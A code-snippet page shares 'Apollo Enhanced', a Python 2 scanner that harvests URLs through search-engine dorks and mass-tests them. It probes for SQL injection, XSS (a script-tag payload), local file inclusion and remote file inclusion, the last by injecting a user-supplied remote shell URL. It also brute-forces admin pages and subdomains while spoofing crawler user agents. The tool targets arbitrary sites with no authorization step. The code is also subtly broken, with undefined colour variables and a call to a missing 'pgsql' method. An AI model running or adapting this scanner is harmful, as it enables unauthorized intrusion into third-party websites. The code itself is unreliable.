Posted By

madfedora on 07/24/13


Tagged

madfedora


Versions (?)

Apollo Enhanced


 / Published in: Python
 

URL: https://github.com/SotdCode

This is a fork of the original project “Apollo” Python Vulnerability Scanner by Sotd. This fork version has majorly enhanced SQL and XSS dorking functions. Please do not rip either mine or Sotd codes, because if you do, KITTENS WILL DIE! Ahem…

  1. #!/usr/bin/env python
  2. """
  3. Apollo.py - Python Vulnerability Scanner V1 -
  4. Written by Sotd - twitter.com/#!/Sotd_
  5.  
  6. Modified and fixed by madfedora
  7. [email protected]
  8. """
  9. import re
  10. import hashlib
  11. import Queue
  12. from random import choice
  13. import threading
  14. import time
  15. import urllib2
  16. import sys
  17. import socket
  18.  
  19. USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
  20. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
  21. "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  22. "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
  23. "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
  24. "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
  25. "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
  26. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sl-SI) AppleWebKit/533.24.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.24.1",
  27. "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/531.13.6",
  28. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)"
  29. ]
  30. option = ' '
  31. vuln = 0
  32. invuln = 0
  33. np = 0
  34. found = []
  35.  
  36. class Crawl:
  37. """Searches for dorks and grabs results"""
  38. def __init__(self):
  39. if option == '4':
  40. self.shell = str(raw_input('Shell Location: '))
  41. self.dork = raw_input('Enter your dork: ')
  42. self.queue = Queue.Queue()
  43. self.pages = raw_input('How many pages (Max 80): ')
  44. self.qdork = urllib2.quote(self.dork)
  45. self.page = 1
  46. self.crawler()
  47.  
  48. def crawler(self):
  49. """Crawler"""
  50. print '\nDorking...'
  51. for i in range(int(self.pages)):
  52. host = "http://us.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
  53. req = urllib2.Request(host)
  54. req.add_header('User-Agent', choice(USER_AGENT))
  55. response = urllib2.urlopen(req)
  56. source = response.read()
  57. start = 0
  58. count = 1
  59. end = len(source)
  60. numlinks = source.count('_t" href', start, end)
  61.  
  62. while count < numlinks:
  63. start = source.find('_t" href', start, end)
  64. end = source.find(' onmousedown="return pk', start, end)
  65. link = source[start+10:end-1].replace("amp;","")
  66. self.queue.put(link)
  67. start = end
  68. end = len(source)
  69. count = count + 1
  70. self.page += 1
  71.  
  72. if option == '1':
  73. for i in range(10):
  74. thread = ScanClass(self.queue)
  75. thread.setDaemon(True)
  76. thread.start()
  77. self.queue.join()
  78.  
  79. elif option == '3':
  80. for i in range(10):
  81. thread = LScanClass(self.queue)
  82. thread.setDaemon(True)
  83. thread.start()
  84. self.queue.join()
  85.  
  86. elif option == '2':
  87. for i in range(10):
  88. thread = XScanClass(self.queue)
  89. thread.setDaemon(True)
  90. thread.start()
  91. self.queue.join()
  92.  
  93. elif option == '4':
  94. for i in range(10):
  95. thread = RScanClass(self.queue, self.shell)
  96. thread.setDaemon(True)
  97. thread.start()
  98. self.queue.join()
  99.  
  100.  
  101. class ScanClass(threading.Thread):
  102. """Scans for Sql errors and ouputs to file"""
  103. def __init__(self, queue):
  104. threading.Thread.__init__(self)
  105. self.queue = queue
  106. self.schar = "'"
  107. self.file = 'sqli-result.txt'
  108.  
  109. def run(self):
  110. """Scans Url for Sql errors"""
  111. while True:
  112. try:
  113. site = self.queue.get(False)
  114. except Queue.Empty:
  115. break
  116. if '=' in site:
  117. global vuln
  118. global invuln
  119. global np
  120. test = site + self.schar
  121.  
  122. try:
  123. conn = urllib2.Request(test)
  124. conn.add_header('User-Agent', choice(USER_AGENT))
  125. opener = urllib2.build_opener()
  126. data = opener.open(conn).read()
  127. except:
  128. self.queue.task_done()
  129. else:
  130. #===========================================================#
  131. # #
  132. # MySQL #
  133. # #
  134. #===========================================================#
  135. if (re.findall("You have an error in your SQL syntax", data, re.I)):
  136. self.mysql(test)
  137. vuln += 1
  138. elif (re.findall('Error:unknown', data, re.I)):
  139. self.mysql(test)
  140. vuln += 1
  141. elif (re.findall('mysql_fetch', data, re.I)):
  142. self.mysql(test)
  143. vuln += 1
  144. elif (re.findall('mysql_numrows', data, re.I)):
  145. self.mysql(test)
  146. vuln += 1
  147. elif (re.findall('mysql_num', data, re.I)):
  148. self.mysql(test)
  149. vuln += 1
  150. elif (re.findall('Invalid Query', data, re.I)):
  151. self.mysql(test)
  152. vuln += 1
  153. elif (re.findall('FetchRow', data, re.I)):
  154. self.mysql(test)
  155. vuln += 1
  156. elif (re.findall('GetArray', data, re.I)):
  157. self.mysql(test)
  158. vuln += 1
  159. elif (re.findall('SELECT statements have a different number of columns', data, re.I)):
  160. self.mysql(test)
  161. vuln += 1
  162. elif (re.findall('\' doesn\'t exist', data, re.I)):
  163. self.mysql(test)
  164. vuln += 1
  165. elif (re.findall('Unexpected EOF found when reading file', data, re.I)):
  166. self.mysql(test)
  167. vuln += 1
  168. elif (re.findall('Triggers can not be created on system tables', data, re.I)):
  169. self.mysql(test)
  170. vuln += 1
  171. #===========================================================#
  172. # #
  173. # MsSQL #
  174. # #
  175. #===========================================================#
  176. elif (re.findall('OLE DB Provider for SQL Server', data, re.I)):
  177. self.mssql(test)
  178. vuln += 1
  179. elif (re.findall('Unclosed quotation mark before the character string', data, re.I)):
  180. self.mssql(test)
  181. vuln += 1
  182. elif (re.findall('All queries in a SQL statement containing a UNION', data, re.I)):
  183. self.mssql(test)
  184. vuln += 1
  185. elif (re.findall('Syntax error converting the varchar value', data, re.I)):
  186. self.mssql(test)
  187. vuln += 1
  188. elif (re.findall('syntax near the keyword \'', data, re.I)):
  189. self.mssql(test)
  190. vuln += 1
  191. elif (re.findall('String or binary data would be truncated', data, re.I)):
  192. self.mssql(test)
  193. vuln += 1
  194. elif (re.findall('Invalid object name \'', data, re.I)):
  195. self.mssql(test)
  196. vuln += 1
  197. elif (re.findall('Incorrect syntax near', data, re.I)):
  198. self.mssql(test)
  199. vuln += 1
  200. #===========================================================#
  201. # #
  202. # Oracle #
  203. # #
  204. #===========================================================#
  205. elif (re.findall('oracle.jdbc.', data, re.I)):
  206. self.oracle(test)
  207. vuln += 1
  208. elif (re.findall('java.sql.sqlexception', data, re.I)):
  209. self.oracle(test)
  210. vuln += 1
  211. elif (re.findall('SQL command not properly ended', data, re.I)):
  212. self.oracle(test)
  213. vuln += 1
  214. elif (re.findall('quoted string not properly terminated', data, re.I)):
  215. self.oracle(test)
  216. vuln += 1
  217. elif (re.findall('wrong number or types of arguments in call to', data, re.I)):
  218. self.oracle(test)
  219. vuln += 1
  220. elif (re.findall('query block has incorrect number of result columns', data, re.I)):
  221. self.oracle(test)
  222. vuln += 1
  223. elif (re.findall('expression must have same datatype as correspoding expression', data, re.I)):
  224. self.oracle(test)
  225. vuln += 1
  226. elif (re.findall('ORA-01722:', data, re.I)):
  227. self.oracle(test)
  228. vuln += 1
  229. elif (re.findall('a non-numeric character was found where a numeric was expected', data, re.I)):
  230. self.oracle(test)
  231. vuln += 1
  232. elif (re.findall('FROM keyword not found where expected', data, re.I)):
  233. self.oracle(test)
  234. vuln += 1
  235. elif (re.findall('ORA-00936:', data, re.I)):
  236. self.oracle(test)
  237. vuln += 1
  238. elif (re.findall('ORA-00972:', data, re.I)):
  239. self.oracle(test)
  240. vuln += 1
  241. elif (re.findall('table or view does not exist', data, re.I)):
  242. self.oracle(test)
  243. vuln += 1
  244. elif (re.findall('Invalid relational operator', data, re.I)):
  245. self.oracle(test)
  246. vuln += 1
  247. elif (re.findall('missing right parenthesis', data, re.I)):
  248. self.oracle(test)
  249. vuln += 1
  250. elif (re.findall('ORA-00900:', data, re.I)):
  251. self.oracle(test)
  252. vuln += 1
  253. elif (re.findall('ORA-03001:', data, re.I)):
  254. self.oracle(test)
  255. vuln += 1
  256. elif (re.findall('can only select from fixed tables/views', data, re.I)):
  257. self.oracle(test)
  258. vuln += 1
  259. #===========================================================#
  260. # #
  261. # OLE DB #
  262. # #
  263. #===========================================================#
  264. elif (re.findall('system.data.oledb', data, re.I)):
  265. self.ole(test)
  266. vuln += 1
  267. elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
  268. self.ole(test)
  269. vuln += 1
  270. #===========================================================#
  271. # #
  272. # ODBC #
  273. # #
  274. #===========================================================#
  275. elif (re.findall('ODBC Microsoft Access Driver', data, re.I)):
  276. self.odbc(test)
  277. vuln += 1
  278. elif (re.findall('ODBC Microsoft Server Driver', data, re.I)):
  279. self.odbc(test)
  280. vuln += 1
  281. #===========================================================#
  282. # #
  283. # JET DB #
  284. # #
  285. #===========================================================#
  286. elif (re.findall('JET Database Engine', data, re.I)):
  287. self.jet(test)
  288. vuln += 1
  289. #===========================================================#
  290. # #
  291. # ADO DB #
  292. # #
  293. #===========================================================#
  294. elif (re.findall('ADODB.Field', data, re.I)):
  295. self.ado(test)
  296. vuln += 1
  297. elif (re.findall('ADODB.Command', data, re.I)):
  298. self.ado(test)
  299. vuln += 1
  300. elif (re.findall('BOF or EOF', data, re.I)):
  301. self.ado(test)
  302. vuln += 1
  303. #===========================================================#
  304. # #
  305. # PostgreSQL #
  306. # #
  307. #===========================================================#
  308. elif (re.findall('postgresql.util', data, re.I)):
  309. self.pgsql(test)
  310. vuln += 1
  311. elif (re.findall('ERROR: invalid input syntax for integer', data, re.I)):
  312. self.pgsql(test)
  313. vuln += 1
  314. elif (re.findall('null_value_eliminated_in_set_function', data, re.I)):
  315. self.pgsql(test)
  316. vuln += 1
  317. elif (re.findall('dynamic_result_sets_returned', data, re.I)):
  318. self.pgsql(test)
  319. vuln += 1
  320. elif (re.findall(': FATAL', data, re.I)):
  321. self.pgsql(test)
  322. vuln += 1
  323. elif (re.findall(': could not connect to server', data, re.I)):
  324. self.pgsql(test)
  325. vuln += 1
  326. #===========================================================#
  327. # #
  328. # Sybase #
  329. # #
  330. #===========================================================#
  331. elif (re.findall('Warning: sybase_query()', data, re.I)):
  332. self.sybase(test)
  333. vuln += 1
  334. elif (re.findall('sybase_fetch_assoc()', data, re.I)):
  335. self.sybase(test)
  336. vuln += 1
  337. #===========================================================#
  338. # #
  339. # Misc #
  340. # #
  341. #===========================================================#
  342. elif (re.findall('query failed:', data, re.I)):
  343. self.misc(test)
  344. vuln += 1
  345. else:
  346. print B+test+W+' <-- Not Vuln'
  347. invuln += 1
  348. else:
  349. print R+site+W+' <-- No Parameters'
  350. np += 1
  351. self.queue.task_done()
  352.  
  353.  
  354. def mysql(self, url):
  355. """Outputs"""
  356. read = open(self.file, "a+").read()
  357. if url in read:
  358. print G+'[DUPE] '+W+url
  359. else:
  360. print O+"[MySQL] " + url+W
  361. write = open(self.file, "a+")
  362. write.write('[MySQL] ' + url + "\n")
  363. write.close()
  364.  
  365. def mssql(self, url):
  366. """Outputs"""
  367. read = open(self.file, "a+").read()
  368. if url in read:
  369. print G+'[DUPE] ' + url+W
  370. else:
  371. print O+"[MsSQL] " + url+W
  372. write = open (self.file, "a+")
  373. write.write('[MsSQL] ' + url + "\n")
  374. write.close()
  375.  
  376. def oracle(self, url):
  377. """Outputs"""
  378. read = open(self.file, "a+").read()
  379. if url in read:
  380. print G+'[DUPE] ' + url+W
  381. else:
  382. print O+"[Oracle] " + url+W
  383. write = open (self.file, "a+")
  384. write.write('[Oracle] ' + url + "\n")
  385. write.close()
  386.  
  387. def ole(self, url):
  388. """Outputs"""
  389. read = open(self.file, "a+").read()
  390. if url in read:
  391. print G+'[DUPE] ' + url+W
  392. else:
  393. print O+"[OLE DB] " + url+W
  394. write = open (self.file, "a+")
  395. write.write('[OLE DB] ' + url + "\n")
  396. write.close()
  397.  
  398. def odbc(self, url):
  399. """Outputs"""
  400. read = open(self.file, "a+").read()
  401. if url in read:
  402. print G+'[DUPE] ' + url+W
  403. else:
  404. print O+"[ODBC] " + url+W
  405. write = open (self.file, "a+")
  406. write.write('[ODBC] ' + url + "\n")
  407. write.close()
  408.  
  409. def jet(self, url):
  410. """Outputs"""
  411. read = open(self.file, "a+").read()
  412. if url in read:
  413. print G+'[DUPE] ' + url+W
  414. else:
  415. print O+"[JET DB] " + url+W
  416. write = open (self.file, "a+")
  417. write.write('[JET DB] ' + url + "\n")
  418. write.close()
  419.  
  420. def ado(self, url):
  421. """Outputs"""
  422. read = open(self.file, "a+").read()
  423. if url in read:
  424. print G+'[DUPE] ' + url+W
  425. else:
  426. print O+"[ADO] " + url+W
  427. write = open (self.file, "a+")
  428. write.write('[ADO] ' + url + "\n")
  429. write.close()
  430.  
  431. def psql(self, url):
  432. """Outputs"""
  433. read = open(self.file, "a+").read()
  434. if url in read:
  435. print G+'[DUPE] ' + url+W
  436. else:
  437. print O+"[PGSQL] " + url+W
  438. write = open (self.file, "a+")
  439. write.write('[PGSQL] ' + url + "\n")
  440. write.close()
  441.  
  442. def sybase(self, url):
  443. """Outputs"""
  444. read = open(self.file, "a+").read()
  445. if url in read:
  446. print G+'[DUPE] ' + url+W
  447. else:
  448. print O+"[SYBASE] " + url+W
  449. write = open (self.file, "a+")
  450. write.write('[SYBASE] ' + url + "\n")
  451. write.close()
  452.  
  453. def misc(self, url):
  454. """Outputs"""
  455. read = open(self.file, "a+").read()
  456. if url in read:
  457. print G+'[DUPE] ' + url+W
  458. else:
  459. print O+"[Misc] " + url+W
  460. write = open (self.file, "a+")
  461. write.write('[Misc] ' + url + "\n")
  462. write.close()
  463.  
  464. class LScanClass(threading.Thread):
  465. """Scans for Lfi errors and outputs to file"""
  466. def __init__(self, queue):
  467. threading.Thread.__init__(self)
  468. self.file = 'lfi-result.txt'
  469. self.queue = queue
  470. self.lchar = '../'
  471.  
  472. def run(self):
  473. """Checks Url for File Inclusion errors"""
  474. while True:
  475. try:
  476. site = self.queue.get(False)
  477. except Queue.Empty:
  478. break
  479. if '=' in site:
  480. lsite = site.rsplit('=', 1)[0]
  481. if lsite[-1] != "=":
  482. lsite = lsite + "="
  483. test = lsite + self.lchar
  484. global vuln
  485. global invuln
  486. global np
  487.  
  488. try:
  489. conn = urllib2.Request(test)
  490. conn.add_header('User-Agent', choice(USER_AGENT))
  491. opener = urllib2.build_opener()
  492. data = opener.open(conn).read()
  493.  
  494. except:
  495. self.queue.task_done()
  496.  
  497. else:
  498. if (re.findall("failed to open stream: No such file or directory", data, re.I)):
  499. self.lfi(test)
  500. vuln += 1
  501. else:
  502. print B+test+W+' <-- Not Vuln'
  503. invuln += 1
  504. else:
  505. print R+site+W+' <-- No Parameters'
  506. np += 1
  507. self.queue.task_done()
  508.  
  509.  
  510. def lfi(self, url):
  511. """Outputs"""
  512. read = open(self.file, "a+").read()
  513. if url in read:
  514. print G+'[DUPE] ' + url+W
  515. else:
  516. print O+"[LFI] " + url+W
  517. write = open(self.file, "a+")
  518. write.write('[LFI] ' + url + "\n")
  519. write.close()
  520.  
  521.  
  522. class XScanClass(threading.Thread):
  523. """Scan for Xss errors and outputs to file"""
  524. def __init__(self, queue):
  525. threading.Thread.__init__(self)
  526. self.queue = queue
  527. self.xchar = """%3CScRIpT%3Ealert(%224p0ll0%22)%3C%2FScRiPt%3E"""
  528. self.file = 'xss-result.txt'
  529.  
  530. def run(self):
  531. """Checks Url for possible Xss"""
  532. while True:
  533. try:
  534. site = self.queue.get(False)
  535. except Queue.Empty:
  536. break
  537. if '=' in site:
  538. global vuln
  539. global invuln
  540. global np
  541. xsite = site.rsplit('=', 1)[0]
  542. if xsite[-1] != "=":
  543. xsite = xsite + "="
  544. test = xsite + self.xchar
  545. try:
  546. conn = urllib2.Request(test)
  547. conn.add_header('User-Agent', choice(USER_AGENT))
  548. opener = urllib2.build_opener()
  549. data = opener.open(conn).read()
  550. except:
  551. self.queue.task_done()
  552. else:
  553. if (re.findall("4p0ll0", data, re.I)):
  554. self.xss(test)
  555. vuln += 1
  556. else:
  557. print B+test+W+' <-- Not Vuln'
  558. invuln += 1
  559. else:
  560. print R+site+W+' <-- No Parameters'
  561. np += 1
  562. self.queue.task_done()
  563.  
  564. def xss(self, url):
  565. """Outputs"""
  566. read = open(self.file, "a+").read()
  567. if url in read:
  568. print G+'[DUPE] ' + url+W
  569. else:
  570. print O+"[XSS] " + url+W
  571. write = open(self.file, "a+")
  572. write.write('[XSS] ' + url + "\n")
  573. write.close()
  574.  
  575.  
  576. class RScanClass(threading.Thread):
  577. """Scans for Rfi errors and outputs to file"""
  578. def __init__(self, queue, shell):
  579. threading.Thread.__init__(self)
  580. self.queue = queue
  581. self.file = 'rfi-result.txt'
  582. self.shell = shell
  583.  
  584. def run(self):
  585. """Checks Url for Remote File Inclusion vulnerability"""
  586. while True:
  587. try:
  588. site = self.queue.get(False)
  589. except Queue.Empty:
  590. break
  591. if '=' in site:
  592. global vuln
  593. global invuln
  594. global np
  595. rsite = site.rsplit('=', 1)[0]
  596. if rsite[-1] != "=":
  597. rsite = rsite + "="
  598. link = rsite + self.shell + '?'
  599. try:
  600. conn = urllib2.Request(link)
  601. conn.add_header('User-Agent', choice(USER_AGENT))
  602. opener = urllib2.build_opener()
  603. data = opener.open(conn).read()
  604. except:
  605. self.queue.task_done()
  606. else:
  607. if (re.findall('uname -a', data, re.I)):
  608. self.rfi(link)
  609. vuln += 1
  610. else:
  611. print B+link+W+' <-- Not Vuln'
  612. invuln += 1
  613. else:
  614. print R+site+W+' <-- No Parameters'
  615. np += 1
  616. self.queue.task_done()
  617.  
  618. def rfi(self, url):
  619. """Outputs"""
  620. read = open(self.file, "a+").read()
  621. if url in read:
  622. print G+'[DUPE] ' + url+W
  623. else:
  624. print O+"[RFI] " + url+W
  625. write = open(self.file, "a+")
  626. write.write('[RFI] ' + url + "\n")
  627. write.close()
  628.  
  629.  
  630. class Atest(threading.Thread):
  631. """Checks given site for Admin Pages"""
  632. def __init__(self, queue):
  633. threading.Thread.__init__(self)
  634. self.queue = queue
  635.  
  636. def run(self):
  637. """Checks if Admin Page exists"""
  638. while True:
  639. try:
  640. site = self.queue.get(False)
  641.  
  642. except Queue.Empty:
  643. break
  644. try:
  645. conn = urllib2.Request(site)
  646. conn.add_header('User-Agent', choice(USER_AGENT))
  647. opener = urllib2.build_opener()
  648. opener.open(conn)
  649. print site
  650. found.append(site)
  651. self.queue.task_done()
  652.  
  653. except urllib2.URLError:
  654. self.queue.task_done()
  655.  
  656.  
  657. def admin():
  658. """Create queue and threads for admin page scans"""
  659. print 'Need to include http:// and ending /\n'
  660. site = raw_input('Site: ')
  661. queue = Queue.Queue()
  662. dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/',
  663. 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
  664. 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html',
  665. 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php',
  666. 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp',
  667. 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
  668. 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
  669. 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
  670. 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
  671. 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
  672. 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
  673. 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
  674. 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
  675. 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
  676. 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
  677. 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
  678. 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
  679. 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
  680. 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  681.  
  682. for add in dirs:
  683. test = site + add
  684. queue.put(test)
  685.  
  686. for i in range(20):
  687. thread = Atest(queue)
  688. thread.setDaemon(True)
  689. thread.start()
  690. queue.join()
  691.  
  692. def aprint():
  693. """Print results of admin page scans"""
  694. print 'Search Finished\n'
  695. if len(found) == 0:
  696. print '-[!]- No pages found'
  697. else:
  698. for site in found:
  699. print O+'-[!]- Found: ' + G+site+W
  700.  
  701.  
  702. class SDtest(threading.Thread):
  703. """Checks given Domain for Sub Domains"""
  704. def __init__(self, queue):
  705. threading.Thread.__init__(self)
  706. self.queue = queue
  707.  
  708. def run(self):
  709. """Checks if Sub Domain responds"""
  710. while True:
  711. try:
  712. domain = self.queue.get(False)
  713. except Queue.Empty:
  714. break
  715. try:
  716. site = domain
  717. conn = urllib2.Request(site)
  718. conn.add_header('User-Agent', choice(USER_AGENT))
  719. opener = urllib2.build_opener()
  720. opener.open(conn)
  721. except urllib2.URLError:
  722. self.queue.task_done()
  723. else:
  724. target = socket.gethostbyname(domain)
  725. print 'Found: ' + site + ' - ' + target
  726. self.queue.task_done()
  727.  
  728.  
  729. def subd():
  730. """Create queue and threads for sub domain scans"""
  731. queue = Queue.Queue()
  732. site = raw_input('Domain: ')
  733. sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
  734. "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
  735. "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
  736. "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
  737. "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
  738. "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
  739. "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
  740. "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
  741. "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
  742. "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
  743. "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
  744. "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
  745. "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]
  746.  
  747. for check in sub:
  748. test = check + '.' + site
  749. queue.put(test)
  750.  
  751. for i in range(20):
  752. thread = SDtest(queue)
  753. thread.setDaemon(True)
  754. thread.start()
  755. queue.join()
